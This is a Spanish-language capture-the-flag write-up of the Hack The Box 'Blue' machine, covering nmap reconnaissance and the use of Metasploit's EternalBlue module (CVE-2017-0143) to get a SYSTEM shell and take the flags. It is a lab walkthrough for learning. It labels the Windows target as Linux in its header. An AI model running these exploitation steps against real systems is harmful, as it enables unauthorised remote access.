Blue - Hack The Box

WRITE UP
IP VÍCTIMA-> 10.10.10.40 (víctima) TTL= 127 LINUX
RECONOCIMIENTO
Lo primero que vamos hacer es crear nuestro entorno de trabajo: blue
Dentro usaremos la herramienta de s4vitar mkt cual nos generara las carpetas necesarias para tener todo más organizado; Nmap…
Para empezar el reconocimiento, enviamos una traza ICMP a la IP de la maquina víctima, para comprobar que tenemos conectividad, tenemos dos alternativas:
-Usar el script whichSystem que nos dirá directamente el equipo al que estamos atacando, por ende habrá tenido ping para dar la respuesta. Es más silencioso que nmap.
whichSystem.py 10.10.10.40

-Usar el comando ping:
ping -c1 10.10.10.40 -R
# -R Lo que hace es un record route que consiste que a la hora de hacer la petición se lo envía a un nodo intermediario para que no sea directa la petición, al ser windows no muestra el prceso*

Después de confirmar que tenemos conectividad, usaremos nmap para a ver que puertos tenemos abiertos y que protocolos/servicios tenemos.
nmap -p- --open -sS --min-rate 5000 -n -Pn -vvv 10.10.10.40 -oG allPorts
# Veremos porque el formato grapeable, es importante.

Una vez hecho, usaremos otra herramienta de s4vitar extractports al archivo allPorts cual nos copiara los puertos, y escanearlos con nmap.
extractports.sh allPorts

nmap -sVC -p135,139,445,49152,49153,49154,49155,49156,49157 10.10.10.40 -oN targeted
# El formato -oN lo emplearemos con batcat lenguaje java para verlo mejor
# Nos mostrará la versión de los servicios que están corriendo
# Usará scripts defaults definidos en lua

Una vez escaneado, usaremos batcat:
https://github.com/sharkdp/bat.git
batcat targeted -l java
# Nos mostrara la salida en un formato más bonito, con java

VULNERABILIDAD SMB: ETERNAL BLUE
Al estar en un Windows antiguo (En este caso Windows 7 Professional) podemos usar el script de nmap “vuln and safe” para comprobar si es vulnerable a EternalBlue.
nmap --script "vuln and safe" -vvv -p445 10.10.10.40 -oN bluevuln

En el escaneo nos saldrá VULNERABLE que nos informa de una vulnerabilidad de smb que nos permite RCE debido a que usa una versión muy antigua de smb, la v1. -> CVE-2017-0143

CONFIGURACIÓN EXPLOIT ETERNALBLUE VIA METASPLOIT
Usaremos Metasploit para configurar un exploit y conseguir una Shell sin necesitar credenciales de ningún usuario.
# Abrir Metasploit
msfconsole
# Buscar el Módulo de Eternal Blue
search eternal blue

Usaremos el primer exploit, por ejemplo.
set 0

Veremos que valores tenemos que configurar:
show options

Tendremos que agregar la IP del host víctima y host atacante:
# Establecer la IP de la máquina objetivo
set RHOSTS 10.10.10.40
# Establecer la IP de nuestra máquina atacante
set LHOST 10.10.14.26

Ahora ejecutamos el exploit.
run o exploit

Nos dará una Shell y estaremos con privilegios como NT AUTHORITY\SYSTEM
getuid

BANDERA USER
Nos vamos al usuario haris y cogemos su bandera en el escritorio.

BANDERA ROOT
Nos vamos al usuario Administrator y cogemos su bandera en el escritorio.
